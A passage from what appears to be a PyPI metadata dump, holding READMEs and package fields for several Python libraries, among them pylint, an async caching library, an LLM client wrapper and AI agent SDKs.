resp = litellm.completion("claude-3-5-haiku-20241022", messages)
```
## Exception Hierarchy
Exceptions mirror LiteLLM for painless migration:
```python
import edgequake_litellm as litellm
try:
resp = litellm.completion("openai/gpt-4o", messages)
except litellm.AuthenticationError as e:
print(f"Check your API key: {e}")
except litellm.RateLimitError:
time.sleep(5)
except litellm.ContextWindowExceededError:
# trim messages and retry
pass
except litellm.NotFoundError: # alias for ModelNotFoundError
pass
except litellm.APIConnectionError:
pass
```
All exceptions (`AuthenticationError`, `RateLimitError`, `ContextWindowExceededError`, `ModelNotFoundError`, `Timeout`, `APIConnectionError`, `APIError`) are also available from `edgequake_litellm.exceptions`.
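Because the hierarchy mirrors LiteLLM's, a generic retry helper works with either import. The sketch below is illustrative (the backoff policy is arbitrary, not something the SDK provides):

```python
import time

def with_retries(call, retryable, attempts=3, base_delay=1.0):
    """Call `call()`, retrying on the given exception types with simple
    exponential backoff; re-raise after the final attempt."""
    for attempt in range(attempts):
        try:
            return call()
        except retryable:
            if attempt == attempts - 1:
                raise
            time.sleep(base_delay * 2 ** attempt)

# e.g. with_retries(lambda: litellm.completion("openai/gpt-4o", messages),
#                   retryable=(litellm.RateLimitError,))
```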
## Environment Variables
Provider credentials follow the standard naming convention:
| Provider | Environment variable |
|--------------|-----------------------------------------------------------|
| OpenAI | `OPENAI_API_KEY` |
| Anthropic | `ANTHROPIC_API_KEY` |
| Gemini | `GEMINI_API_KEY` |
| Mistral | `MISTRAL_API_KEY` |
| OpenRouter | `OPENROUTER_API_KEY` |
| xAI | `XAI_API_KEY` |
| HuggingFace | `HF_TOKEN` |
| Ollama | `OLLAMA_HOST` (default: `http://localhost:11434`) |
| LM Studio | `LMSTUDIO_HOST` (default: `http://localhost:1234`) |
Defaults can also be set via `LITELLM_EDGE_PROVIDER` / `LITELLM_EDGE_MODEL`.
## Development
### Prerequisites
- Rust ≥ 1.83 (`rustup toolchain install stable`)
- Python ≥ 3.9
- `pip install maturin`
### Build from source
```bash
git clone https://github.com/raphaelmansuy/edgequake-llm.git
cd edgequake-llm/edgequake-litellm
# Create a virtual environment
python -m venv .venv
source .venv/bin/activate # Windows: .venv\Scripts\activate
pip install maturin pytest pytest-asyncio ruff mypy
# Build & install in dev mode (incremental Rust + Python)
maturin develop --release
# Run unit tests (mock provider — no API keys needed)
pytest tests/ -k "not e2e" -v
```
### Running E2E tests
```bash
export OPENAI_API_KEY=sk-...
pytest tests/test_e2e_openai.py -v
```
### Publishing
```bash
# Bump version in pyproject.toml AND Cargo.toml (must match), then:
git tag py-v0.2.0
git push --tags
# GitHub Actions builds and publishes to PyPI automatically.
```
## License
Apache-2.0 — see [LICENSE-APACHE](../LICENSE-APACHE).
| text/markdown; charset=UTF-8; variant=GFM | EdgeQuake Contributors | null | EdgeQuake Contributors | null | Apache-2.0 | llm, litellm, openai, anthropic, gemini, mistral, ai, rust | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Rust",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
] | [] | https://github.com/raphaelmansuy/edgequake-llm | null | >=3.9 | [] | [] | [] | [
"pytest>=8.0; extra == \"dev\"",
"pytest-asyncio>=0.24; extra == \"dev\"",
"maturin>=1.7; extra == \"dev\"",
"mypy>=1.8; extra == \"dev\"",
"ruff>=0.3; extra == \"dev\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/raphaelmansuy/edgequake-llm/issues",
"Documentation, https://github.com/raphaelmansuy/edgequake-llm/blob/main/edgequake-litellm/README.md",
"Homepage, https://github.com/raphaelmansuy/edgequake-llm",
"Repository, https://github.com/raphaelmansuy/edgequake-llm"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:08:43.192644 | edgequake_litellm-0.1.1.tar.gz | 709,051 | c8/aa/206f970eb9e37979f7023832fbbd762587e53786f19e765a5f2d25bd53b5/edgequake_litellm-0.1.1.tar.gz | source | sdist | null | false | 6b59e518d1be7886cf7e997570b2a9e4 | 16f55e2cc7a06ba0a42ffddeb6a958f3ba9362b6d1dc5189a551a32ec4d7656f | c8aa206f970eb9e37979f7023832fbbd762587e53786f19e765a5f2d25bd53b5 | null | [] | 587 |
2.4 | modulitiz-mini | 2.11.2 | Raccolta dei miei moduli - versione mini | # modulitiz-mini
It's a Python library that contains everyday, general-purpose functions.
The difference from the "micro" version is that this one requires additional dependencies.
## Installation
Use the package manager [pip](https://pip.pypa.io/en/stable/) to install:
```bash
pip install -U modulitiz_mini
```
The other required dependencies will be installed automatically.
## Usage
```python
from modulitiz_mini.ModuloRsa import ModuloRsa
moduloRsa = ModuloRsa()
moduloRsa.generateKeys()
# returns the encrypted string
encrypted = moduloRsa.encrypt("test")
...
```
## Contributing
If you find any bug you can write me at [sderfo1234@altervista.org](mailto:sderfo1234@altervista.org)
## License
[MIT](https://choosealicense.com/licenses/mit/)
| text/markdown | null | tiz <sderfo1234@altervista.org> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"modulitiz-binaries>=2",
"cryptography>=41.0",
"pypdf==6.6.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:08:25.004450 | modulitiz_mini-2.11.2-py311-none-any.whl | 11,620 | d5/21/a0e27bde9c54afa5eb2fe2080e7a35251a1ebae38f3e33501770d21e3f3e/modulitiz_mini-2.11.2-py311-none-any.whl | py311 | bdist_wheel | null | false | 4e02e7a0bba0cd49e85c9ebd1c2fff85 | dc486646abc1362fc0e0cfdcab1229e92c4214a8900311c262e8c99ecb1aad6d | d521a0e27bde9c54afa5eb2fe2080e7a35251a1ebae38f3e33501770d21e3f3e | null | [
"LICENSE"
] | 96 |
2.4 | pylint | 4.0.5 | python code static checker | `Pylint`_
=========
.. _`Pylint`: https://pylint.readthedocs.io/
.. This is used inside the doc to recover the start of the introduction
.. image:: https://github.com/pylint-dev/pylint/actions/workflows/tests.yaml/badge.svg?branch=main
:target: https://github.com/pylint-dev/pylint/actions
.. image:: https://codecov.io/gh/pylint-dev/pylint/branch/main/graph/badge.svg?token=ZETEzayrfk
:target: https://codecov.io/gh/pylint-dev/pylint
.. image:: https://img.shields.io/pypi/v/pylint.svg
:alt: PyPI Package version
:target: https://pypi.python.org/pypi/pylint
.. image:: https://readthedocs.org/projects/pylint/badge/?version=latest
:target: https://pylint.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
.. image:: https://img.shields.io/badge/code%20style-black-000000.svg
:target: https://github.com/ambv/black
.. image:: https://img.shields.io/badge/linting-pylint-yellowgreen
:target: https://github.com/pylint-dev/pylint
.. image:: https://results.pre-commit.ci/badge/github/pylint-dev/pylint/main.svg
:target: https://results.pre-commit.ci/latest/github/pylint-dev/pylint/main
:alt: pre-commit.ci status
.. image:: https://bestpractices.coreinfrastructure.org/projects/6328/badge
:target: https://bestpractices.coreinfrastructure.org/projects/6328
:alt: CII Best Practices
.. image:: https://img.shields.io/ossf-scorecard/github.com/PyCQA/pylint?label=openssf%20scorecard&style=flat
:target: https://api.securityscorecards.dev/projects/github.com/PyCQA/pylint
:alt: OpenSSF Scorecard
.. image:: https://img.shields.io/discord/825463413634891776.svg
:target: https://discord.gg/qYxpadCgkx
:alt: Discord
What is Pylint?
---------------
Pylint is a `static code analyser`_ for Python 2 or 3. The latest version supports Python
3.10.0 and above.
.. _`static code analyser`: https://en.wikipedia.org/wiki/Static_code_analysis
Pylint analyses your code without actually running it. It checks for errors, enforces a
coding standard, looks for `code smells`_, and can make suggestions about how the code
could be refactored.
.. _`code smells`: https://martinfowler.com/bliki/CodeSmell.html
Install
-------
.. This is used inside the doc to recover the start of the short text for installation
For command line use, pylint is installed with::
pip install pylint
Or if you want to also check spelling with ``enchant`` (you might need to
`install the enchant C library <https://pyenchant.github.io/pyenchant/install.html#installing-the-enchant-c-library>`_):
.. code-block:: sh
pip install pylint[spelling]
It can also be integrated in most editors or IDEs. More information can be found
`in the documentation`_.
.. _in the documentation: https://pylint.readthedocs.io/en/latest/user_guide/installation/index.html
.. This is used inside the doc to recover the end of the short text for installation
What differentiates Pylint?
---------------------------
Pylint does not simply trust your type annotations: it infers the actual values of nodes (not least
because type annotations did not exist when pylint started off) using its internal code
representation (astroid). If your code is ``import logging as argparse``, Pylint
can check and know that ``argparse.error(...)`` is in fact a logging call and not an
argparse call. This makes pylint slower, but it also lets pylint find more issues if
your code is not fully typed.
[inference] is the killer feature that keeps us using [pylint] in our project despite how painfully slow it is.
- `Realist pylint user`_, 2022
.. _`Realist pylint user`: https://github.com/charliermarsh/ruff/issues/970#issuecomment-1381067064
pylint, not afraid of being a little slower than it already is, is also a lot more thorough than other linters.
There are more checks, including some opinionated ones that are deactivated by default
but can be enabled using configuration.
How to use pylint
-----------------
Pylint isn't smarter than you: it may warn you about things that you have
conscientiously done or check for some things that you don't care about.
During adoption, especially in a legacy project where pylint was never enforced,
it's best to start with the ``--errors-only`` flag, then disable
convention and refactor messages with ``--disable=C,R`` and progressively
re-evaluate and re-enable messages as your priorities evolve.
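In practice that progression corresponds to invocations like the following (``mypackage/`` is a placeholder path)::

    pylint --errors-only mypackage/
    pylint --disable=C,R mypackage/
    pylint mypackage/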
Pylint is highly configurable and permits writing plugins to add your
own checks (for example, for internal libraries or an internal rule). Pylint also has an
ecosystem of existing plugins for popular frameworks and third-party libraries.
.. note::
Pylint supports the Python standard library out of the box. Third-party
libraries are not always supported, so a plugin might be needed. A good place
to start is ``PyPI`` which often returns a plugin by searching for
``pylint <library>``. `pylint-pydantic`_, `pylint-django`_ and
`pylint-sonarjson`_ are examples of such plugins. More information about plugins
and how to load them can be found at `plugins`_.
.. _`plugins`: https://pylint.readthedocs.io/en/latest/development_guide/how_tos/plugins.html#plugins
.. _`pylint-pydantic`: https://pypi.org/project/pylint-pydantic
.. _`pylint-django`: https://github.com/pylint-dev/pylint-django
.. _`pylint-sonarjson`: https://github.com/cnescatlab/pylint-sonarjson-catlab
Advised linters alongside pylint
--------------------------------
Projects that you might want to use alongside pylint include ruff_ (**really** fast,
with builtin auto-fix and a large number of checks taken from popular linters, but
implemented in ``rust``) or flake8_ (a framework to implement your own checks in python using ``ast`` directly),
mypy_, pyright_ / pylance or pyre_ (typing checks), bandit_ (security oriented checks), black_ and
isort_ (auto-formatting), autoflake_ (automated removal of unused imports or variables), pyupgrade_
(automated upgrade to newer python syntax) and pydocstringformatter_ (automated pep257).
.. _ruff: https://github.com/astral-sh/ruff
.. _flake8: https://github.com/PyCQA/flake8
.. _bandit: https://github.com/PyCQA/bandit
.. _mypy: https://github.com/python/mypy
.. _pyright: https://github.com/microsoft/pyright
.. _pyre: https://github.com/facebook/pyre-check
.. _black: https://github.com/psf/black
.. _autoflake: https://github.com/myint/autoflake
.. _pyupgrade: https://github.com/asottile/pyupgrade
.. _pydocstringformatter: https://github.com/DanielNoord/pydocstringformatter
.. _isort: https://pycqa.github.io/isort/
Additional tools included in pylint
-----------------------------------
Pylint ships with two additional tools:
- pyreverse_ (standalone tool that generates package and class diagrams.)
- symilar_ (duplicate code finder that is also integrated in pylint)
.. _pyreverse: https://pylint.readthedocs.io/en/latest/additional_tools/pyreverse/index.html
.. _symilar: https://pylint.readthedocs.io/en/latest/additional_tools/symilar/index.html
.. This is used inside the doc to recover the end of the introduction
Contributing
------------
.. This is used inside the doc to recover the start of the short text for contribution
We welcome all forms of contributions such as updates for documentation, new code, checking issues for duplicates or telling us
that we can close them, confirming that issues still exist, `creating issues because
you found a bug or want a feature`_, etc. Everything is much appreciated!
Please follow the `code of conduct`_ and check `the Contributor Guides`_ if you want to
make a code contribution.
.. _creating issues because you found a bug or want a feature: https://pylint.readthedocs.io/en/latest/contact.html#bug-reports-feedback
.. _code of conduct: https://github.com/pylint-dev/pylint/blob/main/CODE_OF_CONDUCT.md
.. _the Contributor Guides: https://pylint.readthedocs.io/en/latest/development_guide/contribute.html
.. This is used inside the doc to recover the end of the short text for contribution
Show your usage
-----------------
You can place this badge in your README to let others know your project uses pylint.
.. image:: https://img.shields.io/badge/linting-pylint-yellowgreen
:target: https://github.com/pylint-dev/pylint
Learn how to add a badge to your documentation in `the badge documentation`_.
.. _the badge documentation: https://pylint.readthedocs.io/en/latest/user_guide/installation/badge.html
License
-------
pylint is, with a few exceptions listed below, `GPLv2 <https://github.com/pylint-dev/pylint/blob/main/LICENSE>`_.
The icon files are licensed under the `CC BY-SA 4.0 <https://creativecommons.org/licenses/by-sa/4.0/>`_ license:
- `doc/logo.png <https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/logo.png>`_
- `doc/logo.svg <https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/logo.svg>`_
Support
-------
Please check `the contact information`_.
.. _`the contact information`: https://pylint.readthedocs.io/en/latest/contact.html
.. |tideliftlogo| image:: https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/media/Tidelift_Logos_RGB_Tidelift_Shorthand_On-White.png
:width: 200
:alt: Tidelift
.. list-table::
:widths: 10 100
* - |tideliftlogo|
- Professional support for pylint is available as part of the `Tidelift
Subscription`_. Tidelift gives software development teams a single source for
purchasing and maintaining their software, with professional grade assurances
from the experts who know it best, while seamlessly integrating with existing
tools.
.. _Tidelift Subscription: https://tidelift.com/subscription/pkg/pypi-pylint?utm_source=pypi-pylint&utm_medium=referral&utm_campaign=readme
| text/x-rst | null | Python Code Quality Authority <code-quality@python.org> | null | null | null | lint, linter, python, static code analysis | [
"Development Status :: 6 - Mature",
"Environment :: Console",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Debuggers",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Testing",
"Typing :: Typed"
] | [] | null | null | >=3.10.0 | [] | [] | [] | [
"astroid<=4.1.dev0,>=4.0.2",
"colorama>=0.4.5; sys_platform == \"win32\"",
"dill>=0.2; python_version < \"3.11\"",
"dill>=0.3.6; python_version >= \"3.11\"",
"dill>=0.3.7; python_version >= \"3.12\"",
"isort!=5.13,<9,>=5",
"mccabe<0.8,>=0.6",
"platformdirs>=2.2",
"tomli>=1.1; python_version < \"3.11\"",
"tomlkit>=0.10.1",
"typing-extensions>=3.10; python_version < \"3.10\"",
"pyenchant~=3.2; extra == \"spelling\"",
"gitpython>3; extra == \"testutils\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/pylint-dev/pylint/issues",
"Discord Server, https://discord.com/invite/Egy6P8AMB5",
"Docs: Contributor Guide, https://pylint.readthedocs.io/en/latest/development_guide/contributor_guide/index.html",
"Docs: User Guide, https://pylint.readthedocs.io/en/latest/",
"homepage, https://github.com/pylint-dev/pylint",
"Source Code, https://github.com/pylint-dev/pylint",
"What's New, https://pylint.readthedocs.io/en/latest/whatsnew/3/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:33.621681 | pylint-4.0.5.tar.gz | 1,572,474 | e4/b6/74d9a8a68b8067efce8d07707fe6a236324ee1e7808d2eb3646ec8517c7d/pylint-4.0.5.tar.gz | source | sdist | null | false | ff24104a1e510616efce2356f3d64988 | 8cd6a618df75deb013bd7eb98327a95f02a6fb839205a6bbf5456ef96afb317c | e4b674d9a8a68b8067efce8d07707fe6a236324ee1e7808d2eb3646ec8517c7d | GPL-2.0-or-later | [
"LICENSE",
"CONTRIBUTORS.txt"
] | 959,810 |
2.4 | pystackquery | 1.0.2 | Async data fetching and caching library for Python | # PyStackQuery
Async data fetching and caching library for Python.
PyStackQuery handles the hard parts of working with async data: caching, deduplication, retries, and reactive state updates. You focus on *what* to fetch; the library handles *how*.
## Installation
```bash
pip install pystackquery
```
Requires Python 3.11+
## Quick Start
```python
import asyncio
import aiohttp  # used by fetch_user below
from pystackquery import QueryClient, QueryOptions
client = QueryClient()
async def fetch_user(user_id: int) -> dict:
# Your async fetch logic here
async with aiohttp.ClientSession() as session:
async with session.get(f"https://api.example.com/users/{user_id}") as resp:
return await resp.json()
async def main():
# Fetch with automatic caching
user = await client.fetch_query(
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123)
)
)
# Second call returns cached data instantly
user_again = await client.fetch_query(
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123)
)
)
asyncio.run(main())
```
That's it. The first call fetches from the API. The second call returns instantly from cache.
## What Problems Does This Solve?
**Without PyStackQuery**, you write code like this over and over:
```python
cache = {}
pending = {}
lock = asyncio.Lock()
async def get_user(user_id):
key = f"user_{user_id}"
async with lock:
if key in cache:
return cache[key]
if key in pending:
return await pending[key]
task = asyncio.create_task(fetch_user(user_id))
pending[key] = task
try:
result = await task
cache[key] = result
return result
finally:
del pending[key]
```
**With PyStackQuery**, you write:
```python
user = await client.fetch_query(
QueryOptions(("user", user_id), lambda: fetch_user(user_id))
)
```
The library handles:
- Caching
- Request deduplication (concurrent calls share one request)
- Automatic retries with backoff
- Stale-while-revalidate
- Cache invalidation
- Reactive updates
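Retry with backoff, one of the behaviors listed above, typically looks like the following. This is a generic sketch, not PyStackQuery's exact policy; the `attempts` and `base_delay` knobs are illustrative:

```python
import asyncio

async def with_retries(fn, attempts=3, base_delay=0.1):
    """Call `fn` until it succeeds, doubling the delay between failures."""
    for attempt in range(attempts):
        try:
            return await fn()
        except Exception:
            if attempt == attempts - 1:
                raise  # out of attempts: surface the last error
            await asyncio.sleep(base_delay * 2 ** attempt)
```

The exponential delay (0.1s, 0.2s, 0.4s, ...) avoids hammering a struggling backend while still recovering quickly from transient failures.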
## Core Concepts
### Query Keys
Every query needs a unique key. Keys are tuples of strings:
```python
("users",) # All users
("user", "123") # Specific user
("posts", "user", "123") # Posts by user 123
```
Keys enable:
- Cache lookups
- Partial invalidation (invalidate `("users",)` clears all user queries)
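The partial-invalidation behavior amounts to prefix matching on tuple keys. A plain-Python sketch of the idea (not PyStackQuery's actual internals):

```python
def matches_prefix(query_key: tuple, prefix: tuple) -> bool:
    """True when `prefix` is a leading slice of `query_key`."""
    return query_key[:len(prefix)] == prefix

cache = {
    ("users",): ["alice", "bob"],
    ("user", "123"): {"name": "alice"},
    ("posts", "user", "123"): ["post-1"],
}

def invalidate(prefix: tuple) -> None:
    """Drop every cached entry whose key starts with `prefix`."""
    for key in [k for k in cache if matches_prefix(k, prefix)]:
        del cache[key]
```

Invalidating `("user",)` here removes `("user", "123")` but leaves `("posts", "user", "123")` alone, since the prefix must match from the left.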
### Query Options
Configure how a query behaves:
```python
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123),
stale_time=60.0, # Data fresh for 60 seconds
retry=3, # Retry 3 times on failure
)
```
### Stale-While-Revalidate
When data becomes stale, you get the cached data immediately while a background refresh happens:
```python
# First call: fetches from API
data = await client.fetch_query(opts)
# Wait for stale_time to pass...
# Second call: returns stale data instantly, refreshes in background
data = await client.fetch_query(opts)
```
Your users see data immediately. Fresh data loads in the background.
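The decision reduces to comparing a cache entry's age against `stale_time`. A minimal, library-independent sketch (the real implementation also handles deduplication and errors):

```python
import time

class Entry:
    def __init__(self, data, fetched_at):
        self.data = data
        self.fetched_at = fetched_at

def resolve(entry, stale_time, now=None):
    """Return (data, needs_background_refresh) for a cached entry."""
    now = time.monotonic() if now is None else now
    is_stale = (now - entry.fetched_at) > stale_time
    # Stale data is still returned immediately; the caller schedules a refresh.
    return entry.data, is_stale
```

The key point: staleness never blocks the caller. It only flags that a background refetch should be kicked off.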
## Documentation
See the [docs/](./docs/) folder for comprehensive documentation:
- [Getting Started](./docs/getting-started.md) - Installation and basic usage
- [Query Options](./docs/query-options.md) - All configuration options explained
- [Mutations](./docs/mutations.md) - Handling POST/PUT/DELETE operations
- [Cache Management](./docs/cache-management.md) - Invalidation, prefetching, manual updates
- [Observers](./docs/observers.md) - Reactive state updates
- [Advanced Patterns](./docs/advanced-patterns.md) - Dependent queries, parallel fetching
- [Framework Integrations](./docs/framework-integrations.md) - FastAPI, Tkinter, Textual, CLI tools, Jupyter
- [API Reference](./docs/api-reference.md) - Complete API documentation
## License
MIT
| text/markdown | null | null | null | null | null | async, cache, data-fetching, query, state-management | [
"Development Status :: 4 - Beta",
"Framework :: AsyncIO",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"typing-extensions>=4.0",
"aiohttp>=3.9; extra == \"dev\"",
"mypy>=1.9; extra == \"dev\"",
"pytest-asyncio>=0.23; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"ruff>=0.3; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:30.171169 | pystackquery-1.0.2.tar.gz | 94,994 | e0/b0/d7a2162020f3b9b0c929610b49e23c955713fd1ab3002b01163c319dcd89/pystackquery-1.0.2.tar.gz | source | sdist | null | false | a3034296b6692ac24b035dcad56181e3 | 43a49c0baa9887e230eb7aec1c448dbc5deb22545900ad618aead841f7d08ff0 | e0b0d7a2162020f3b9b0c929610b49e23c955713fd1ab3002b01163c319dcd89 | MIT | [] | 218 |
2.4 | flow-platform-sdk | 1.0.0 | Python SDK for Uniphore Flow Platform APIs | # Flow Platform SDK
Python SDK for interacting with Uniphore Flow Platform services via async RPC.
## Usage
```python
import asyncio
from flow_platform_sdk import platform_api
async def main():
# List data connectors
connectors = await platform_api.list_connectors()
# Execute SQL query
result = await platform_api.execute_query(
connector_id="conn_123",
sql_query="SELECT * FROM customers LIMIT 10",
max_rows=10
)
# Query knowledge base
answer = await platform_api.query_knowledge_base(
knowledge_base_id="kb_123",
query="What is the revenue?"
)
asyncio.run(main())
```
## API Reference
### Data Connectors
```python
# List all connectors
await platform_api.list_connectors()
# Get schema
await platform_api.get_schema(connector_id="conn_123")
# Execute query
await platform_api.execute_query(
connector_id="conn_123",
sql_query="SELECT * FROM table",
max_rows=1000
)
# Discover schema
await platform_api.discover_schema(
connector_id="conn_123",
include_sample_data=True,
table_filter="customer*"
)
# Get table info
await platform_api.get_table_info(
connector_id="conn_123",
table_name="customers"
)
# Get sample data
await platform_api.get_sample_data(
connector_id="conn_123",
table_name="customers",
limit=5
)
```
### Knowledge Base
```python
# List knowledge bases
await platform_api.list_knowledge_bases()
# Query knowledge base
await platform_api.query_knowledge_base(
knowledge_base_id="kb_123",
query="What are the main features?"
)
```
### Agent Evaluation
```python
# Invoke agent with draft skill
result = await platform_api.invoke_agent(
agent_spec_id="agent_123",
draft_skill_id="draft_456",
input_message="What is the weather today?",
context={"location": "San Francisco"},
timeout=60
)
```
## Architecture
The SDK uses stdio-based RPC for communication with backend services:
- Requests sent to **stdout**: `REMOTE_SERVICE_CALL:{...}`
- Responses read from **stdin**: `REMOTE_TOOL_RESULT:{...}`
Designed for sandboxed execution environments.
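Assuming each message is a single line with a fixed prefix followed by JSON (as the markers above suggest), framing and parsing can be sketched as follows. The `method`/`params` field names are illustrative assumptions, not the SDK's documented wire format:

```python
import json

CALL_PREFIX = "REMOTE_SERVICE_CALL:"
RESULT_PREFIX = "REMOTE_TOOL_RESULT:"

def frame_call(method: str, params: dict) -> str:
    """Serialize an outgoing request line for stdout."""
    return CALL_PREFIX + json.dumps({"method": method, "params": params})

def parse_result(line: str) -> dict:
    """Parse a response line read from stdin; reject unknown framing."""
    if not line.startswith(RESULT_PREFIX):
        raise ValueError(f"unexpected line: {line!r}")
    return json.loads(line[len(RESULT_PREFIX):])
```

Line-oriented framing like this is a common choice for sandboxed subprocesses: stdout/stdin are the only channels available, and the prefix keeps RPC traffic distinguishable from stray prints.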
## Configuration
- Default timeout: 120 seconds per request
- Daemon threads for clean exit on timeout
## Development
```bash
# Setup
uv sync
# Format code
uvx ruff format .
uvx ruff check .
```
| text/markdown | null | Uniphore <support@uniphore.com> | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.0",
"pydantic>=2.0.0",
"typing-extensions>=4.0.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:20.560975 | flow_platform_sdk-1.0.0.tar.gz | 8,334 | c2/f5/82ca9619d25bcbaf40759bf9c0aae1e87bf026ecad39df895ef125510870/flow_platform_sdk-1.0.0.tar.gz | source | sdist | null | false | 6e46dbb68ab0ee96170a6b9edc015d22 | 6198bb2c2e6bd2678f4931aeccb9ae0f0d9113fd0696f0259dc8c3fa5ea0a021 | c2f582ca9619d25bcbaf40759bf9c0aae1e87bf026ecad39df895ef125510870 | null | [] | 337 |
2.4 | pixell-sdk | 0.4.32 | A lightweight developer kit for packaging AI agents into portable APKG files | # Pixell Agent Kit
A lightweight developer kit for packaging AI agents into portable, standardized APKG files.
## Installation
### Using pipx (Recommended)
```bash
pipx install pixell-kit
```
### Using Homebrew
```bash
brew install pixell-kit
```
### Using pip
```bash
pip install pixell-kit
```
## Quick Start
```bash
# Create a new agent project
pixell init my_agent
# Run locally for development
cd my_agent
pixell run-dev
# Build into APKG package
pixell build
# Inspect the package
pixell inspect my_agent-0.1.0.apkg
```
## Configuration
Pixell Kit supports flexible configuration management to avoid entering credentials repeatedly. You can configure API keys and app IDs at multiple levels with the following precedence order:
### 1. Environment Variables (Highest Priority)
```bash
export PIXELL_API_KEY=your-api-key
export PIXELL_APP_ID=your-app-id
export PIXELL_ENVIRONMENT=prod
```
### 2. Project-Level Configuration
Create `.pixell/config.json` in your project directory:
```json
{
"api_key": "your-api-key",
"app_id": "your-default-app-id",
"default_environment": "prod",
"environments": {
"prod": {"app_id": "your-production-app-id"},
"staging": {"app_id": "your-staging-app-id"},
"local": {"app_id": "your-local-app-id"}
}
}
```
### 3. Global Configuration
Create `~/.pixell/config.json` for user-wide settings:
```json
{
"api_key": "your-api-key",
"app_id": "your-default-app-id"
}
```
### Configuration Commands
```bash
# Interactive setup (recommended for first-time users)
pixell config init
# Set individual values
pixell config set --api-key your-api-key
pixell config set --app-id your-app-id
pixell config set --env-app-id prod:your-prod-app-id
pixell config set --env-app-id staging:your-staging-app-id
# Set global configuration (affects all projects)
pixell config set --global --api-key your-api-key
# View current configuration
pixell config show
pixell config show --global
```
### Simplified Deployment
Once configured, you can deploy without specifying credentials every time:
```bash
# Deploy to production (uses stored credentials)
pixell deploy --apkg-file my_agent-0.1.0.apkg
# Deploy to staging (uses environment-specific app ID)
pixell deploy --apkg-file my_agent-0.1.0.apkg --env staging
# Deploy to local development
pixell deploy --apkg-file my_agent-0.1.0.apkg --env local
```
## Environment and Secrets
### Phase 1: Required .env in APKG
- Every agent package must include a `.env` at the project root.
- Builds fail if `.env` is missing.
- The builder always includes `.env` in the APKG.
- The validator warns on potential secrets and non-portable absolute paths.
Scaffold:
- `pixell init` generates a `.env.example`. Copy to `.env` and fill values.
Notes:
- Treat `.env` as sensitive; it is packaged. Use placeholders for shared artifacts.
### Phase 2: Runtime Environment Injection (Dev parity)
- The dev server automatically loads `.env` and applies variables to the process environment.
- Precedence (dev): `.env` > base environment.
- Logs show variable keys only, never values.
### Phase 3: Service-Bound Secrets (Dev parity)
- Optional secrets providers can inject runtime secrets without baking them into `.env`.
- Provider selection is controlled by environment variables:
- `PIXELL_SECRETS_PROVIDER=static` with `PIXELL_SECRETS_JSON` (JSON object)
- `PIXELL_SECRETS_PROVIDER=env` to pass-through current process env
- `PIXELL_SECRETS_PROVIDER=aws` to use AWS Secrets Manager with:
- `PIXELL_AWS_SECRETS` (comma-separated secret names/ARNs)
- optional `PIXELL_AWS_REGION`
- Precedence (dev): provider > `.env` > base env.
Example (static):
```bash
export PIXELL_SECRETS_PROVIDER=static
export PIXELL_SECRETS_JSON='{"OPENAI_API_KEY":"runtime","DB_HOST":"database"}'
```
Example (AWS):
```bash
export PIXELL_SECRETS_PROVIDER=aws
export PIXELL_AWS_SECRETS=my/app/secrets,another/secret
export PIXELL_AWS_REGION=us-east-1
```
### Best Practices
- Use `0.0.0.0` for bind addresses inside containers (not `localhost`).
- Avoid absolute, machine-specific paths in `.env`.
- Never log secret values; only keys. The kit adheres to this.
### PAR Guidance (separate runtime)
- Apply precedence in the agent subprocess:
1) Runtime deployment env (highest)
2) `.env` from APKG
3) Base runtime environment (lowest)
- Optionally add service-bound providers per deployment context.
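The three-level precedence above amounts to a right-biased dict merge, lowest-priority layer first (a sketch; the variable names are illustrative):

```python
def effective_env(base: dict, dotenv: dict, runtime: dict) -> dict:
    """Merge environment layers; later (higher-priority) layers win."""
    return {**base, **dotenv, **runtime}
```

For example, a `DB_HOST` set in the `.env` overrides the base environment, while a runtime deployment value overrides both.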
## Features
- 📦 Package any AI agent into portable APKG files
- 🚀 Local development server with hot-reload
- ✅ Manifest validation and package integrity
- 🔐 Optional package signing with GPG
- 🐍 Python 3.11+ support (TypeScript coming soon)
---
## SDK Runtime
The Pixell SDK provides runtime infrastructure for agent execution, including task queue processing, user context management, and progress reporting.
### Installation
```bash
pip install pixell-sdk
```
### Quick Start
```python
import asyncio
from pixell.sdk import UserContext, TaskConsumer
